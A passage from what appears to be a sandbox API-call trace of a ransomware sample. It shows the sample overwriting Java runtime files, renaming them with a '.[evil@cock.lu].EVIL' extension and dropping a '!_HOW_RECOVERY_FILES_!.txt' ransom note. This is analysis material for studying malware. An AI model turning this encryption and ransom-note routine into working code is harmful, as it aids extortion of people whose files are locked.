(normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightdemiitalic.ttf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiItalic.ttf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightdemiitalic.ttf.[evil@cock.lu].evil")) returned 1 [0097.146] ??_V@YAXPEAX@Z () returned 0x1 [0097.149] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiItalic.ttf", dwFileAttributes=0x0) returned 0 [0097.149] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.149] wcsstr (_Str="LucidaBrightItalic.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.149] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightItalic.ttf") returned 68 [0097.149] wcscmp (_String1="LucidaBrightItalic.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.149] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LucidaBrightItalic.ttf") returned 0x0 [0097.149] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightItalic.ttf") returned 0x44 [0097.149] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightitalic.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.153] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x13bd8, lpOverlapped=0x0) returned 1 [0097.156] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.156] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.156] _errno () returned 0x84b1160840 [0097.157] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.157] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x13be0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x13be0, lpOverlapped=0x0) returned 1 [0097.157] CloseHandle (hObject=0x1a8) returned 1 [0097.157] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightItalic.ttf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.158] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.158] __uncaught_exception () returned 0x84b1160800 [0097.158] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.158] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightItalic.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightitalic.ttf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightItalic.ttf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightitalic.ttf.[evil@cock.lu].evil")) returned 1 [0097.159] ??_V@YAXPEAX@Z () returned 0x1 [0097.162] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightItalic.ttf", dwFileAttributes=0x0) returned 0 [0097.163] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.163] wcsstr (_Str="LucidaBrightRegular.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.163] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightRegular.ttf") returned 69 [0097.163] wcscmp (_String1="LucidaBrightRegular.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.163] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LucidaBrightRegular.ttf") returned 0x0 [0097.163] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightRegular.ttf") returned 0x45 [0097.163] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.165] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5434c, lpOverlapped=0x0) returned 1 [0097.215] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.215] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.215] _errno () returned 0x84b1160840 [0097.216] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.216] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x54360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x54360, lpOverlapped=0x0) returned 1 [0097.217] CloseHandle (hObject=0x1a8) returned 1 [0097.217] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightRegular.ttf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.217] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.217] __uncaught_exception () returned 0x84b1160800 [0097.217] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.217] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightregular.ttf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightRegular.ttf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidabrightregular.ttf.[evil@cock.lu].evil")) returned 1 [0097.218] ??_V@YAXPEAX@Z () returned 0x1 [0097.222] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightRegular.ttf", dwFileAttributes=0x0) returned 0 [0097.222] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.222] wcsstr (_Str="LucidaSansDemiBold.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.222] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 68 [0097.222] wcscmp (_String1="LucidaSansDemiBold.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.222] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LucidaSansDemiBold.ttf") returned 0x0 [0097.222] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansDemiBold.ttf") returned 0x44 [0097.222] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidasansdemibold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.224] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4d9c8, lpOverlapped=0x0) returned 1 [0097.229] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.229] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.229] _errno () returned 0x84b1160840 [0097.230] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.230] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x4d9e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4d9e0, lpOverlapped=0x0) returned 1 [0097.231] CloseHandle (hObject=0x1a8) returned 1 [0097.231] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansDemiBold.ttf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.231] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.231] __uncaught_exception () returned 0x84b1160800 [0097.231] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.231] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansDemiBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidasansdemibold.ttf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansDemiBold.ttf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidasansdemibold.ttf.[evil@cock.lu].evil")) returned 1 [0097.232] ??_V@YAXPEAX@Z () returned 0x1 [0097.235] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansDemiBold.ttf", dwFileAttributes=0x0) returned 0 [0097.236] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.236] wcsstr (_Str="LucidaSansRegular.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.236] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansRegular.ttf") returned 67 [0097.236] wcscmp (_String1="LucidaSansRegular.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.236] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LucidaSansRegular.ttf") returned 0x0 [0097.236] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansRegular.ttf") returned 0x43 [0097.236] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidasansregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.238] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaa77c, lpOverlapped=0x0) returned 1 [0097.258] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.258] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.258] _errno () returned 0x84b1160840 [0097.259] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.259] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xaa780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xaa780, lpOverlapped=0x0) returned 1 [0097.261] CloseHandle (hObject=0x1a8) returned 1 [0097.261] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansRegular.ttf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.261] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.261] __uncaught_exception () returned 0x84b1160800 [0097.261] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.261] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidasansregular.ttf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansRegular.ttf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidasansregular.ttf.[evil@cock.lu].evil")) returned 1 [0097.262] ??_V@YAXPEAX@Z () returned 0x1 [0097.265] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansRegular.ttf", dwFileAttributes=0x0) returned 0 [0097.266] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.266] wcsstr (_Str="LucidaTypewriterBold.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.266] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 70 [0097.266] wcscmp (_String1="LucidaTypewriterBold.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.266] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LucidaTypewriterBold.ttf") returned 0x0 [0097.266] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterBold.ttf") returned 0x46 [0097.266] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidatypewriterbold.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.275] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x39254, lpOverlapped=0x0) returned 1 [0097.280] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.280] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.280] _errno () returned 0x84b1160840 [0097.280] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.280] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x39260, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x39260, lpOverlapped=0x0) returned 1 [0097.281] CloseHandle (hObject=0x1a8) returned 1 [0097.281] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterBold.ttf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.281] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.281] __uncaught_exception () returned 0x84b1160800 [0097.281] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.281] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterBold.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidatypewriterbold.ttf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterBold.ttf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidatypewriterbold.ttf.[evil@cock.lu].evil")) returned 1 [0097.282] ??_V@YAXPEAX@Z () returned 0x1 [0097.285] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterBold.ttf", dwFileAttributes=0x0) returned 0 [0097.286] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.286] wcsstr (_Str="LucidaTypewriterRegular.ttf", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.286] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 73 [0097.286] wcscmp (_String1="LucidaTypewriterRegular.ttf", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.286] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LucidaTypewriterRegular.ttf") returned 0x0 [0097.286] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterRegular.ttf") returned 0x49 [0097.286] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidatypewriterregular.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.288] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3b40c, lpOverlapped=0x0) returned 1 [0097.313] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.313] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.313] _errno () returned 0x84b1160840 [0097.314] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.314] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x3b420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3b420, lpOverlapped=0x0) returned 1 [0097.314] CloseHandle (hObject=0x1a8) returned 1 [0097.314] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterRegular.ttf", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.315] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.315] __uncaught_exception () returned 0x84b1160800 [0097.315] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.315] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterRegular.ttf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidatypewriterregular.ttf"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterRegular.ttf.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\fonts\\lucidatypewriterregular.ttf.[evil@cock.lu].evil")) returned 1 [0097.316] ??_V@YAXPEAX@Z () returned 0x1 [0097.319] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterRegular.ttf", dwFileAttributes=0x0) returned 0 [0097.319] FindNextFileW (in: hFindFile=0x84b11dda40, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0097.319] FindClose (in: hFindFile=0x84b11dda40 | out: hFindFile=0x84b11dda40) returned 1 [0097.319] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts") returned 0x2d [0097.319] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.320] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.320] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.320] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0097.320] __uncaught_exception () returned 0x84b1160800 [0097.320] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.321] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.321] wcsstr (_Str="hijrah-config-umalqura.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.321] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties") returned 73 [0097.321] wcscmp (_String1="hijrah-config-umalqura.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.321] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="hijrah-config-umalqura.properties") returned 0x0 [0097.321] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties") returned 0x49 [0097.321] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.323] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x368a, lpOverlapped=0x0) returned 1 [0097.326] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.326] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.326] _errno () returned 0x84b1160840 [0097.327] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.327] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x36a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x36a0, lpOverlapped=0x0) returned 1 [0097.327] CloseHandle (hObject=0x1a4) returned 1 [0097.327] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.327] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.327] __uncaught_exception () returned 0x84b1160800 [0097.327] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.327] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties.[evil@cock.lu].evil")) returned 1 [0097.328] ??_V@YAXPEAX@Z () returned 0x1 [0097.332] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties", dwFileAttributes=0x0) returned 0 [0097.332] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.332] wcsstr (_Str="images", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.332] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images") returned 46 [0097.332] wcscmp (_String1=".", _String2="images") returned -1 [0097.332] wcscmp (_String1="..", _String2="images") returned -1 [0097.332] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images") returned 0x2e [0097.332] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images") returned 0x0 [0097.332] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\*" [0097.332] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd860 [0097.332] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.332] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\.") returned 48 [0097.332] wcscmp (_String1=".", _String2=".") returned 0 [0097.332] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.333] wcsstr 